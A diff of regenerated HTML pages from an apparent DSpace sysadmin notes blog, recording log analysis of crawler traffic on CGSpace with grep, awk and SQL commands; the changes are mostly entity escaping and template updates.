# grep 137.108.70 /var/log/nginx/access.log | grep -c &quot;GET /discover&quot;
# grep 137.108.70 /var/log/nginx/access.log | grep -c &#34;GET /discover&#34;
24055
</code></pre><ul>
<li>Just because I&rsquo;m curious who the top IPs are:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
496 62.210.247.93
571 46.4.94.226
651 40.77.167.39
@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Compute Engine</li>
<li>Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don&rsquo;t reuse their session variable, creating thousands of new sessions!</li>
</ul>
<pre><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1419
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2811
</code></pre><ul>
<li>From looking at the requests, it appears these are from CIAT and CCAFS</li>
@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ah, wait, it looks like <code>crawlerIps</code> only came in 2017-06, so probably isn&rsquo;t in Ubuntu 16.04&rsquo;s 7.0.68 build!</li>
<li>That would explain the errors I was getting when trying to set it:</li>
</ul>
<pre><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property &#39;crawlerIps&#39; to &#39;190\.19\.92\.5|104\.196\.152\.243&#39; did not find a matching property.
</code></pre><ul>
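<li>A quick way to confirm which Tomcat build the Ubuntu package actually ships (a sketch, assuming the stock <code>tomcat7</code> package):</li>
</ul>
<pre><code>$ dpkg -s tomcat7 | grep -i '^version'
</code></pre><ul>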
<li>As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)&#39; dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ask on the dspace-tech mailing list if it&rsquo;s possible to use an existing item as a template for a new item</li>
<li>To follow up on the CORE bot traffic, there were almost 300,000 requests yesterday:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h
139109 137.108.70.6
139253 137.108.70.7
</code></pre><ul>
@ -408,7 +408,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I added <a href="https://goaccess.io/">GoAccess</a> to the list of packages to install in the DSpace role of the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a></li>
<li>It makes it very easy to analyze nginx logs from the command line, to see where traffic is coming from:</li>
</ul>
<pre><code># goaccess /var/log/nginx/access.log --log-format=COMBINED
<pre tabindex="0"><code># goaccess /var/log/nginx/access.log --log-format=COMBINED
</code></pre><ul>
<li>According to Uptime Robot CGSpace went down and up a few times</li>
<li>I had a look at goaccess and I saw that CORE was actively indexing</li>
@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I&rsquo;m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable</li>
<li>Actually, come to think of it, they aren&rsquo;t even obeying <code>robots.txt</code>, because we actually disallow <code>/discover</code> and <code>/search-filter</code> URLs but they are hitting those massively:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | grep -o -E &quot;GET /(discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | grep -o -E &#34;GET /(discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
158058 GET /discover
14260 GET /search-filter
</code></pre><ul>
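<li>A quick way to double check what we are disallowing (a sketch):</li>
</ul>
<pre><code>$ curl -s https://cgspace.cgiar.org/robots.txt | grep -E 'Disallow: /(discover|search-filter)'
</code></pre>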
@ -443,15 +443,15 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -78,12 +78,12 @@ COPY 54701
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -129,7 +129,7 @@ COPY 54701
<p class="blog-post-meta">
<time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -142,12 +142,12 @@ COPY 54701
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre><ul>
<li>Abenet asked if it would be possible to generate a report of items in Listing and Reports that had &ldquo;International Fund for Agricultural Development&rdquo; as the <em>only</em> investor</li>
@ -155,7 +155,7 @@ COPY 54701
<li>Work on making the thumbnails in the item view clickable</li>
<li>Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link</li>
</ul>
<pre><code>//mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE=&#39;CONTENT&#39;]/mets:file/mets:FLocat[@LOCTYPE=&#39;URL&#39;]/@xlink:href
</code></pre><ul>
<li>METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml</li>
<li>I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!</li>
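<li>A quick way to test that XPath from the command line is curl plus xmllint, roughly like this (a sketch; xmllint doesn&rsquo;t know the METS namespaces, hence the <code>local-name()</code> workaround):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'https://cgspace.cgiar.org/metadata/handle/10568/95947/mets.xml' \
  | xmllint --xpath "string(//*[local-name()='fileGrp'][@USE='CONTENT']/*[local-name()='file']/*[local-name()='FLocat'][@LOCTYPE='URL']/@*[local-name()='href'])" -
</code></pre><ul>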
@ -177,7 +177,7 @@ COPY 54701
<li>It&rsquo;s the first time in a few days that this has happened</li>
<li>I had a look to see what was going on, but it isn&rsquo;t the CORE bot:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
306 68.180.229.31
323 61.148.244.116
414 66.249.66.91
@ -191,7 +191,7 @@ COPY 54701
</code></pre><ul>
<li>138.201.52.218 is from some Hetzner server, and I see it making 40,000 requests yesterday too, but none before that:</li>
</ul>
<pre><code># zgrep -c 138.201.52.218 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 138.201.52.218 /var/log/nginx/access.log*
/var/log/nginx/access.log:24403
/var/log/nginx/access.log.1:45958
/var/log/nginx/access.log.2.gz:0
@ -202,7 +202,7 @@ COPY 54701
</code></pre><ul>
<li>It&rsquo;s clearly a bot as it&rsquo;s making tens of thousands of requests, but it&rsquo;s using a &ldquo;normal&rdquo; user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
</code></pre><ul>
<li>For now I don&rsquo;t know what this user is!</li>
</ul>
@ -216,7 +216,7 @@ COPY 54701
<ul>
<li>But in the database the authors are correct (none with weird <code>, /</code> characters):</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Livestock Research Institute%&#39;;
text_value | authority | confidence
--------------------------------------------+--------------------------------------+------------
International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c | 0
@ -240,7 +240,7 @@ COPY 54701
<li>Tsega had to restart Tomcat 7 to fix it temporarily</li>
<li>I will start by looking at bot usage (access.log.1 includes usage until 6AM today):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
619 65.49.68.184
840 65.49.68.199
924 66.249.66.91
@ -254,7 +254,7 @@ COPY 54701
</code></pre><ul>
<li>104.196.152.243 seems to be a top scraper for a few weeks now:</li>
</ul>
<pre><code># zgrep -c 104.196.152.243 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 104.196.152.243 /var/log/nginx/access.log*
/var/log/nginx/access.log:336
/var/log/nginx/access.log.1:4681
/var/log/nginx/access.log.2.gz:3531
@ -268,64 +268,64 @@ COPY 54701
</code></pre><ul>
<li>This user is responsible for hundreds and sometimes thousands of Tomcat sessions:</li>
</ul>
<pre><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
954
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
6199
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
7051
</code></pre><ul>
<li>The worst thing is that this user never specifies a user agent string so we can&rsquo;t lump it in with the other bots using the Tomcat Session Crawler Manager Valve</li>
<li>They don&rsquo;t request dynamic URLs like &ldquo;/discover&rdquo; but they seem to be fetching handles from XMLUI instead of REST (and some with <code>//handle</code>, note the regex below):</li>
</ul>
<pre><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
4681
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P &#39;GET //?handle&#39;
4618
</code></pre><ul>
<li>I just realized that <code>ciat.cgiar.org</code> points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior</li>
<li>The next IP (207.46.13.36) seems to be Microsoft&rsquo;s bingbot, but all its requests specify the &ldquo;bingbot&rdquo; user agent and there are no requests for dynamic URLs that are forbidden, like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
<pre tabindex="0"><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
2034
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:</li>
</ul>
<pre><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
5997
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;bingbot&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;bingbot&#34;
5988
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c Google
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
1131
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:</li>
</ul>
<pre><code># grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1
2950
# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
330
</code></pre><ul>
<li>Their user agents vary, ie:
@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I&rsquo;ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs</li>
<li>While it&rsquo;s not in the top ten, Baidu is one bot that seems to not give a fuck:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep -c Baiduspider
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep -c Baiduspider
8912
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep Baiduspider | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep Baiduspider | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
2521
</code></pre><ul>
<li>According to their documentation their bot <a href="http://www.baidu.com/search/robots_english.html">respects <code>robots.txt</code></a>, but I don&rsquo;t see this being the case</li>
@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I should look in nginx access.log, rest.log, oai.log, and DSpace&rsquo;s dspace.log.2017-11-07</li>
<li>Here are the top IPs making requests to XMLUI from 2 to 8 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
279 66.249.66.91
373 65.49.68.199
446 68.180.229.254
@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot</li>
<li>Here are the top IPs making requests to REST from 2 to 8 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
8 207.241.229.237
10 66.249.66.90
16 104.196.152.243
@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The OAI requests during that same time period are nothing to worry about:</li>
</ul>
<pre><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
1 66.249.66.92
4 66.249.66.90
6 68.180.229.254
</code></pre><ul>
<li>The top IPs from dspace.log during the 2 to 8 AM period:</li>
</ul>
<pre><code>$ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code>$ grep -E &#39;2017-11-07 0[2-8]&#39; dspace.log.2017-11-07 | grep -o -E &#39;ip_addr=[0-9.]+&#39; | sort -n | uniq -c | sort -h | tail
143 ip_addr=213.55.99.121
181 ip_addr=66.249.66.91
223 ip_addr=157.55.39.161
@ -400,7 +400,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>The number of requests isn&rsquo;t even that high to be honest</li>
<li>As I was looking at these logs I noticed another heavy user (124.17.34.59) that was not active during this time period, but made many requests today alone:</li>
</ul>
<pre><code># zgrep -c 124.17.34.59 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 124.17.34.59 /var/log/nginx/access.log*
/var/log/nginx/access.log:22581
/var/log/nginx/access.log.1:0
/var/log/nginx/access.log.2.gz:14
@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The whois data shows the IP is from China, but the user agent doesn&rsquo;t really give any clues:</li>
</ul>
<pre><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F'&quot; ' '{print $3}' | sort | uniq -c | sort -h
210 &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&quot;
22610 &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&quot;
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F&#39;&#34; &#39; &#39;{print $3}&#39; | sort | uniq -c | sort -h
210 &#34;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&#34;
22610 &#34;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&#34;
</code></pre><ul>
<li>A Google search for &ldquo;LCTE bot&rdquo; doesn&rsquo;t return anything interesting, but this <a href="https://stackoverflow.com/questions/42500881/what-is-lcte-in-user-agent">Stack Overflow discussion</a> references the lack of information</li>
<li>So basically after a few hours of looking at the log files I am no closer to understanding what is going on!</li>
@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 12:00 to 14:00)</li>
<li>At least for now it seems to be that new Chinese IP (124.17.34.59):</li>
</ul>
<pre><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
198 207.46.13.103
203 207.46.13.80
205 207.46.13.36
@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>Seems 124.17.34.59 is really downloading all our PDFs, compared to the next top active IPs during this time!</li>
</ul>
<pre><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
5948
# grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
# grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
0
</code></pre><ul>
<li>About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reusing their Tomcat session and they are creating thousands of sessions per day</li>
<li>All CIAT requests vs unique ones:</li>
</ul>
<pre><code>$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
<pre tabindex="0"><code>$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | wc -l
3506
$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | sort | uniq | wc -l
3506
</code></pre><ul>
<li>I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API</li>
@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<ul>
<li>But they literally just made this request today:</li>
</ul>
<pre><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &quot;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&quot; 200 82265 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot;
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &#34;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&#34; 200 82265 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34;
</code></pre><ul>
<li>Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:</li>
</ul>
<pre><code># grep -c Baiduspider /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c Baiduspider /var/log/nginx/access.log
3806
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
1085
</code></pre><ul>
<li>I will think about blocking their IPs but they have 164 of them!</li>
</ul>
<pre><code># grep &quot;Baiduspider/2.0&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#34;Baiduspider/2.0&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq | wc -l
164
